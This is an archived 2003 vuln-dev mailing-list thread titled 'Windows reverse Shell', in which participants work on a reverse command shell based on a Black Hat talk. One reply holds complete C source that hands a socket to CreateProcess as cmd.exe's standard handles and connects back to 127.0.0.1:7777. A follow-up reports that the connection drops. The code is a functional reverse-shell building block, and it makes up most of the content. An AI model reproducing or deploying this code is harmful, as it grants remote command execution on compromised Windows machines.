Hello 3APA3A, Thnx for ur code. The one i wrote is absolutely the same without bind. Infact we dont need "bind", though David Litchfield mentions it in his Blackhat talk. SO anyway did u try compiling ur code? if not u should try, coz i c the same results,ie i get connection on my netcat, but then it suddenly disconnects. no command prompt. Tuesday, February 4, 2003, 10:34:56 PM, you wrote: 3> Return-Path: <3APA3Aat_private> 3> X-Sieve: cmu-sieve 2.0 3> Received: from woland.freenet.kg (woland.freenet.kg [212.112.99.34]) 3> by mail.hotmail.kg (Hotmail.KG edition/Version 1.0) with ESMTP id h14GVEb17456 3> for <netninjaat_private>; Tue, 4 Feb 2003 21:31:14 +0500 (KGT) 3> Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) 3> by woland.freenet.kg (8.12.6/8.12.6) with ESMTP id h14HtUoc013643 3> for <netninjaat_private>; Tue, 4 Feb 2003 22:55:39 +0500 3> Received: from anonymous.sandy.ru (anonymous.sandy.ru. [195.122.226.40]) 3> by adm.sci-nnov.ru (8.11.6/8.11.6) with ESMTP id h14GYuu38518; 3> Tue, 4 Feb 2003 19:34:56 +0300 (MSK) 3> (envelope-from 3APA3Aat_private) 3> Date: Tue, 4 Feb 2003 19:34:56 +0300 3> From: 3APA3A <3APA3Aat_private> 3> X-Mailer: The Bat! (v1.61) 3> Reply-To: 3APA3A <3APA3Aat_private> 3> Organization: http://www.security.nnov.ru 3> X-Priority: 3 (Normal) 3> Message-ID: <1939904491.20030204193456at_private> 3> To: SecFocus <netninjaat_private> 3> CC: vuln-devat_private 3> Subject: Re: Windows reverse Shell 3> In-Reply-To: <1028124981.20030204013745at_private> 3> References: <1028124981.20030204013745at_private> 3> MIME-Version: 1.0 3> Content-Type: text/plain; charset=Windows-1251 3> Content-Transfer-Encoding: 8bit 3> Dear NetNinja, 3> Code below successfully brings reverse shell to 127.0.0.1:7777. 3> #include <windows.h> 3> #include <winsock2.h> 3> #include <stdio.h> 3> int main(int argc, char* argv[]){ 3> WSADATA wd; 3> HANDLE h; 3> SOCKET sock; 3> STARTUPINFO si; 3> PROCESS_INFORMATION pi; 3> struct sockaddr_in sin; 3> int size = sizeof(sin); 3> memset(&sin, 0, sizeof(sin)); 3> memset(&si, 0, sizeof(si)); 3> WSAStartup(MAKEWORD( 1, 1 ), &wd); 3> sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); 3> sin.sin_family = AF_INET; 3> bind(sock, (struct sockaddr*)&sin, size); 3> sin.sin_port = htons(7777); 3> sin.sin_addr.s_addr = inet_addr("127.0.0.1"); 3> connect(sock, (struct sockaddr*)&sin, size); 3> si.cb = sizeof(si); 3> si.dwFlags = STARTF_USESTDHANDLES; 3> si.hStdInput = si.hStdOutput = si.hStdError = sock; 3> CreateProcess( 3> NULL, 3> "cmd.exe", 3> NULL, 3> NULL, 3> TRUE, 3> 0, 3> 0, 3> NULL, 3> &si, 3> &pi 3> ); 3> return 0; 3> } 3> --Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-devat_private: N>> Hello guys, N>> David Litchfield in his Blackhat talk, talked about using socket handle N>> from WSASocket() and pass that handle as a parameter to stdin, stdout N>> and stderr for CreateProcess function. By doin this way his reverse N>> cmd shellcode becomes much smaller. I tried coding that reverse N>> command shell in C, but couldnt get it to work. It simply connects to N>> my listening netcat listener and then disconnects. David Litchfield N>> used 4 functions to achieva that WSASocket, bind, connect and N>> CreateProcess. A lil help would b appreciated on building this reverse N>> cmd shell. thanx. -- Best regards, Adik mailto:netninjaat_private
This archive was generated by hypermail 2b30 : Wed Feb 05 2003 - 09:22:27 PST